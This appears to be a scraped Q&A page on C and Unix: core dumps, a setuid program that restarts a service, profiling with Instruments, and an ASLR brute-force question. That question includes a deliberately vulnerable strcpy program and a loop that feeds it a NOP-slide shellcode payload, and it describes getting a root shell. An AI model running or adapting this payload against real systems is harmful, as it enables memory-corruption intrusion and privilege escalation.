Dump core if SIGSEGV (in C)? - c

How can I dump the core when my program receives the SIGSEGV signal ? (The server that runs my program has very limited permissions and therefore core dump is disabled by default.)
I have written the following using gcore but I would like to use C functions instead. Can I somehow catch the core and write it to a folder somewhere ?
void segfaulthandler(int parameter)
{
char gcore[50];
sprintf(gcore, "gcore -s -c \"core\" %u", getpid());
system(gcore);
exit(1);
}
int main(void)
{
signal(SIGSEGV, segfaulthandler);
}

Unless there's a hard limit preventing you, you could use setrlimit(RLIMIT_CORE, ...) to increase the softlimit and enable coredumps - this corresponds to running ulimit -c in shell.

On linux, you typically can do:
$ ulimit -c unlimited
The resulting core file will be written in the current working directory of the process when the signal is received.

Related

Is there a system call to run systemctl in C program (not the system() function)?

I am on a Ubuntu 22.04 server. I want to run:
systemctl restart someService
but want to do so in a C program.
Intuitively I tried:
system("systemctl restart someService")
This did not work even if my program itself has setUid set to root as systemctl does not itself have setUid bit set to root.
I would like to write a program and set its uid to root so that anyone can execute it to restart a certain system service. This is only possible by using some direct function and not the system call as done above. Any suggestions?
I don't think there is a system-call that can do the job of systemctl in general. I think your approach of calling the systemctl command from your program is correct. But, I am not getting into the security considerations here. You should be really careful when writing set-uid programs.
Now, the main issue with your code is that system should not be used from set-uid binaries because it doesn't let you control the environment variables, which can be set maliciously before calling your program to change the behavior of the called process. Besides that, the system command calls /bin/sh to run your command which on some versions of Linux drop privilege as mentioned on the man-page linked above. The right approach would be to use execve family of functions that offer more control and do not spawn a shell. What you need to do can be done in the following way -
int main(int argc, char* argv[]) {
setuid(0);
setgid(0);
char *newargv[] = {"/usr/bin/systemctl", "restart", "someService", NULL};
char *newenviron[] = { NULL };
execve(newargv[0], newargv, newenviron);
perror("execve"); /* execve() returns only on error */
exit(EXIT_FAILURE);
}
Notice the empty (or pure) environment above. It is worth noting that the execve should not return unless there is an error. If you need to wait for the return value from the systemctl command, you might have to combine this with fork

coredump redirect to file

I am invoking make from my C program, which intern executes another program. I am redirecting both the standard out and standard error to a file. However, when the program run by make terminates due to segmentation fault, a core dump is generated and printed to the console (standard out) of the main program that is invoking make.
How can I get around this and not have the core dump show on the console?
The following is my code to invoke make :
int pid = fork();
if(pid==0){
dup2(make_logs, 1);
dup2(make_logs, 2);
close(make_logs);
execvp (args[0],args);
}
Where make_logs is the file opened using 'open'
Thanks
I would try to fix the core dump rather than suppressing the message, but the message about the segmentation fault is being generated by the shell (which detects the exit value of the child and recognize a core dump situation), so you can suppress it by installing your own program that handles the fork() and wait() rather than having the shell do the work.
To suppress the core dump, just use limit coredumpsize 0.
Sample of suppression (sloppy code; you should really be checking for errors):
#include <sys/types.h>
#include <sys/wait.h>
main( int argc, char **argv )
{
int pid;
if( (pid = fork() ) > 0 ) wait( 0 );
else if( pid == 0 ) {
execl( "program-that-cdumps", "program-that-cdumps", 0 );
perror("failed in execl");
} else perror("failed in fork");
}
Read core(5) and signal(7) man pages.
Compile all your programs with gcc -Wall -g. Then use
file core
to understand which binary dumped the core. It probably says something like core dump from foo to tell you that program foo dumped the core. Then, start a post mortem debugger on it:
gdb foo core
and use the common gdb commands (notably bt to backtrace, p to print, etc...).
The message dumped core is given by some shell (or perhaps by make when it is acting like a shell). I don't think that the core file is output to stdout (it is a big binary file).
If you wish to avoid the core (which IMHO is a bad idea, a core dump is a good symptom of something wrong), you could call the setrlimit(2) syscall with RLIMIT_CORE and a 0 limit after your fork and before the execvp. I believe you should not do that (or at least have some way of configuring that setrlimit is not called: sometimes you really need the core dump to debug the problem).
You should fix the problem which gives the core dump, not try to avoid the dumped core message!
If you run make on a user provided Makefile so that the core dump is from a user program, you really want to keep the user informed that a core did happen, so you should keep the core dumped message.

ASLR brute force

I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64b computer and after changing the return address a bit, he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well know scenario chown root ./vul, chmod +s ./vul, shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...) and finally whoami that returns 'root' in the spawned shell).
That is quite strange since execstack -q ./vul tels me the executable stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32bits machine as you did not pass the option -m32 to gcc in order to get 32bits code.
Finally, I did run your program without success (I waited way more than a few seconds).
So, I'm a bit doubtful about your conclusion (except if you are running a very peculiar Linux system or may have been lucky).
Anyway, there are two main things that you have not mentionned:
Having a bug that offer an unlimited exploitation windows is quite rare.
Most of the modern systems run on amd64 (64bits) processors, which lower drastically the probability to hit the nop-zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.

Core Dump is is not working

When I run programs with segfaults I get an error message Segmentation fault: 11. For some reason, I'm not getting the (core dumped) message. I tried running the shell command ulimit -c unlimited, but I still get the same error and it doesn't say core dumped. I'm new to GDB so I tried it with a simple program:
/* coredump.c */
#include <stdio.h>
int main (void) {
int *point = NULL;
*point = 0;
return 0;
}
But when I compile using:
gcc coredump.c -g -o coredump
And run it, it still says segfault: 11
Is it still creating a core dump somewhere I don't know about? I want to be able to use gdb coredump core.
Look at this link:
How to generate a core dump in Linux when a process gets a segmentation fault?
Options include:
ulimit -c unlimited (default = 0: no core files generated)
the directory for the dump must be writable. By default this is the current directory of the process, but that may be changed by setting /proc/sys/kernel/core_pattern.
in some conditions, the kernel value in /proc/sys/fs/suid_dumpable may prevent the core to be generated.
"man core" for other options
find / -name core -print 2> /dev/null to search your filesystem for core files
I presume you're running Linux, and I presume you're executing the .exe in a directory where you have write permissions.
So my top two guesses would be 1) "ulimit -c unlimited" isn't getting set, or is being overridden, or 2) the core files are being generated, but going "somewhere else".
The above suggestions should help. Please post back what you find!
If you're running the program that crashes from the shell, then you should follow the guidelines in Apple's Tech Note TN2124, which I found out about in in the answer to SO2207233.
There are a few key points:
You need to set ulimit -c unlimited in bash (same effect, different command in tcsh).
You need to set the permissions on the /cores directory so that you can create files in it. The default permissions are 1775; you need 1777. The 1 indicates the sticky bit is set.
The core dumps are then created in /cores suffixed with a PID (/cores/core.5312, for example).
If you want programs launched graphically to dump core when they crash, then you need to create /etc/launchd.conf if it does not already exist, and add a line limit core unlimited to the file. Again, see the information in the Tech Note for more details.
Watch it; core dumps are huge! Consider this not very complicated or big program:
#include <stdio.h>
int main(void)
{
int *i = 0;
int j = 0;
printf("i = %d, j = %d, i / j = %d\n", *i, j, *i / j);
return 0;
}
The core dump from this is nearly 360 MB.
Using gcc, if you add the flags:
gcc -g -dH
you should be able to generate a core dump
The -g flag produces some debugging information to use with gdb, and the -dH flag produces a core dump when there is an error
Sometimes core files are not store in current directory and may follow a different naming rule
sysctl -a | grep kern.core
may give hints to where your core files are stored

How use Instruments and display the console in Command Lines applications [duplicate]

This question already has answers here:
How can I see the output of an OS X program being run via the Time Profiler in Instruments?
(2 answers)
Closed 3 months ago.
I'm using Xcode on OSX to develop command line C applications. I would also like to use Instruments to profile and find memory leaks.
However, I couldn't find a way to display the console when launching the application from within Instruments. I'm also unable to attach to a running command line process (it exits with an error):
Here's an example code:
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <setjmp.h>
static sigjmp_buf jmpbuf;
void handler(int sig) {
char c[BUFSIZ];
printf ("Got signal %d\n", sig);
printf ("Deseja sair? (s/n) ");
fgets(c, sizeof(c), stdin);
if(c[0] == 's') {
exit(0);
} else {
siglongjmp(jmpbuf, 1);
}
}
int main(void) {
char buf[BUFSIZ];
signal(SIGINT, handler);
sigsetjmp(jmpbuf, 1);
while(1) {
printf(">>>");
fgets(buf, sizeof(buf), stdin);
printf ("Introduziu: %s\n", buf);
}
return(0);
}
Here's the error I got after launching Instruments, and trying to attach to the running process in xcode:
[Switching to process 1475]
[Switching to process 1475]
Error while running hook_stop:
sharedlibrary apply-load-rules all
Error while running hook_stop:
Invalid type combination in ordering comparison.
Error while running hook_stop:
Invalid type combination in ordering comparison.
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Unable to disassemble __CFInitialize.
Any thoughts?
It's easy. See the screenshot.
It's a little late to contribute to this old thread, however I have found the best way of profiling a command line utility is to use iprofiler (manpage). This allows data to be collected from the command line simply by adding this to the start of the command line:
iprofiler -leaks -d $HOME/tmp
(I have a private temporary directory at $HOME/tmp, so you might need to use /tmp or leave the -d command line option off altogether).
My test scripts automatically add that to the command line if $FINDLEAKS is defined (and will prepend valgrind if running under Linux).
This then generates a .dtps file (actually a directory) which can be loaded and anaylysed using Instruments.
If you are compiling using clang then simply add both -O3 and -g (clang doesn't support the -pg command line option).
You can change the output in the Options dropdown when choosing your target. The output will appear in the system Console (Applications/Utilities/Console).

Resources